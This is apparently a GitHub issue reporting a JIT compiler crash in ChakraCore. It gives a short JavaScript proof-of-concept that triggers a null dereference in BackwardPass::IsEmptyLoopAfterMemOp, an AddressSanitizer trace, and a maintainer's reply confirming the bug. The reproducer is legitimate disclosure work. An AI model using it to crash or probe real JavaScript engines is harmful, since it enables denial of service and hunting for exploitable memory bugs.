
SEGV on unknown address 0x000000000000 #6888

Open tjuTangSong opened 1 year ago

tjuTangSong commented 1 year ago

Branch: master Commit: cbb9b101d18e4c1682ca39a52a201d8e4241ea17 POC is:

// Typed array of 0x10000 elements. The reporter's note on the slice call below says the
// engine treats an array of this size as a VirtualUint32Array — taken from that note, not verified here.
let xxx = new Uint32Array(0x10000);

// Replace the typed array's own slice with the generic Array.prototype.slice, so that
// arr.slice(0,0) inside jit() goes through the generic Array path (the reporter's comment
// there says the result "becomes a definite Uint32Array" while arr itself does not).
xxx.slice = Array.prototype.slice;

/**
 * Function the reporter drives towards JIT compilation (see the calling loop below).
 * Per the ASan trace in this report the crash happens on the background code-generation
 * thread (BackwardPass::IsEmptyLoopAfterMemOp), i.e. while this function or its loop is being
 * compiled, not while the generated code executes.
 * @param {Uint32Array} arr  typed array whose slice was replaced with Array.prototype.slice
 * @param {number} index     not referenced in the body; the caller passes 2
 */
function jit(arr, index){
        let ut = arr.slice(0,0);   //become definite Uint32Array but |arr| is a VirtualUint32Array
        // `i < (i + 4)` is true for every value i reaches here, so this store loop is effectively
        // unbounded; its shape (a loop storing a constant into arr[i]) is what the JIT's memop
        // optimization recognises — the reporter's note says the failure is at |Op_memset|.
        for(let i = 0; i < (i + 4); i++){
                arr[i] = 0;   //will be crash at |Op_memset|
        }
}

// Repeated calls intended to get jit() (or its inner loop) picked up by the JIT.
// NOTE(review): since the loop inside jit() is effectively unbounded, the first call probably
// never returns in the interpreter and the crash comes from the background codegen thread while
// that call is still running (see the ASan trace: thread T2, NativeCodeGenerator) — confirm.
for(let i = 0;i < 0x10000; i++){
        jit(xxx, 2);
}

// Reached only if compilation does not crash: jit() stores 0 into arr[0] on its first
// iteration, so 'pass' is printed. WScript.Echo is supplied by the ch test host.
if (xxx[0] === 0)
{
    WScript.Echo('pass');
}

In a release build (`./build.sh --sanitize=address --static -j`) I get:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==10375==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x5654a00b501f bp 0x7f2732ef76b0 sp 0x7f2732ef75a0 T2)
==10375==The signal is caused by a READ memory access.
==10375==Hint: address points to the zero page.
    #0 0x5654a00b501e in BackwardPass::IsEmptyLoopAfterMemOp(Loop*) (/root/ChakraCore-latest/out/Release/ch+0x1dff01e)
    #1 0x5654a005db67 in BackwardPass::Optimize() (/root/ChakraCore-latest/out/Release/ch+0x1da7b67)
    #2 0x56549fbbc9dc in GlobOpt::BackwardPass(Js::Phase) (/root/ChakraCore-latest/out/Release/ch+0x19069dc)
    #3 0x56549fbbd3e1 in GlobOpt::Optimize() (/root/ChakraCore-latest/out/Release/ch+0x19073e1)
    #4 0x56549fba4d16 in Func::TryCodegen() (/root/ChakraCore-latest/out/Release/ch+0x18eed16)
    #5 0x56549fba43c0 in Func::Codegen(Memory::JitArenaAllocator*, JITTimeWorkItem*, ThreadContextInfo*, ScriptContextInfo*, JITOutputIDL*, Js::EntryPointInfo*, FunctionJITRuntimeInfo const*, JITTimePolymorphicInlineCacheInfo*, void*, Js::ScriptContextProfiler*, bool) (/root/ChakraCore-latest/out/Release/ch+0x18ee3c0)
    #6 0x56549fa1fbd8 in NativeCodeGenerator::CodeGen(Memory::PageAllocatorBase<Memory::VirtualAllocWrapper, Memory::SegmentBase<Memory::VirtualAllocWrapper>, Memory::PageSegmentBase<Memory::VirtualAllocWrapper> >*, CodeGenWorkItemIDL*, JITOutputIDL&, bool, Js::EntryPointInfo*) (/root/ChakraCore-latest/out/Release/ch+0x1769bd8)
    #7 0x56549fa20350 in NativeCodeGenerator::CodeGen(Memory::PageAllocatorBase<Memory::VirtualAllocWrapper, Memory::SegmentBase<Memory::VirtualAllocWrapper>, Memory::PageSegmentBase<Memory::VirtualAllocWrapper> >*, CodeGenWorkItem*, bool) (/root/ChakraCore-latest/out/Release/ch+0x176a350)
    #8 0x56549fa21f5d in NativeCodeGenerator::Process(JsUtil::Job*, JsUtil::ParallelThreadData*) (/root/ChakraCore-latest/out/Release/ch+0x176bf5d)
    #9 0x56549fa551a3 in JsUtil::BackgroundJobProcessor::Process(JsUtil::Job*, JsUtil::ParallelThreadData*) (/root/ChakraCore-latest/out/Release/ch+0x179f1a3)
    #10 0x56549fa55500 in JsUtil::BackgroundJobProcessor::Run(JsUtil::ParallelThreadData*) (/root/ChakraCore-latest/out/Release/ch+0x179f500)
    #11 0x56549fa511c1 in JsUtil::BackgroundJobProcessor::StaticThreadProc(void*) (/root/ChakraCore-latest/out/Release/ch+0x179b1c1)
    #12 0x56549e7391e8 in CorUnix::CPalThread::ThreadEntry(void*) (/root/ChakraCore-latest/out/Release/ch+0x4831e8)
    #13 0x56549e63a85e in __asan::AsanThread::ThreadStart(unsigned long, __sanitizer::atomic_uintptr_t*) (/root/ChakraCore-latest/out/Release/ch+0x38485e)
    #14 0x7f2f3978c6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #15 0x7f2f38af361e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12161e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/root/ChakraCore-latest/out/Release/ch+0x1dff01e) in BackwardPass::IsEmptyLoopAfterMemOp(Loop*)
Thread T2 created by T0 here:
    #0 0x56549e585e00 in pthread_create (/root/ChakraCore-latest/out/Release/ch+0x2cfe00)
    #1 0x56549e738101 in CorUnix::InternalCreateThread(CorUnix::CPalThread*, _SECURITY_ATTRIBUTES*, unsigned int, unsigned int (*)(void*), void*, unsigned int, CorUnix::PalThreadType, unsigned int*, void**) (/root/ChakraCore-latest/out/Release/ch+0x482101)
    #2 0x56549e737aea in CreateThread (/root/ChakraCore-latest/out/Release/ch+0x481aea)
    #3 0x56549fa509ce in JsUtil::BackgroundJobProcessor::InitializeParallelThreadData(AllocationPolicyManager*, bool) (/root/ChakraCore-latest/out/Release/ch+0x179a9ce)
    #4 0x56549fa51ac8 in JsUtil::BackgroundJobProcessor::BackgroundJobProcessor(AllocationPolicyManager*, JsUtil::ThreadService*, bool) (/root/ChakraCore-latest/out/Release/ch+0x179bac8)
    #5 0x56549ea0b911 in ThreadContext::GetJobProcessor() (/root/ChakraCore-latest/out/Release/ch+0x755911)
    #6 0x56549fa1c428 in NativeCodeGenerator::NativeCodeGenerator(Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x1766428)
    #7 0x56549fa13ac8 in NewNativeCodeGenerator(Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x175dac8)
    #8 0x56549e9c6386 in Js::ScriptContext::Initialize() (/root/ChakraCore-latest/out/Release/ch+0x710386)
    #9 0x56549e84d622 in JsrtContextCore::EnsureScriptContext() (/root/ChakraCore-latest/out/Release/ch+0x597622)
    #10 0x56549e84d335 in JsrtContextCore::New(JsrtRuntime*) (/root/ChakraCore-latest/out/Release/ch+0x597335)
    #11 0x56549e7401bd in CreateContextCore(void*, TTD::TTDJsRTActionResultAutoRecorder&, bool, bool, bool, void**) (/root/ChakraCore-latest/out/Release/ch+0x48a1bd)
    #12 0x56549e743569 in JsCreateContext (/root/ChakraCore-latest/out/Release/ch+0x48d569)
    #13 0x56549e66d2db in ExecuteTest(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3b72db)
    #14 0x56549e66e606 in main (/root/ChakraCore-latest/out/Release/ch+0x3b8606)
    #15 0x7f2f389f3c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)

==10375==ABORTING
ppenzin commented 1 year ago

Thank you for the report, this seems to be a bug. This also leads to a plain segfault with sanitizers turned off, which is why I am setting severity:1 for now.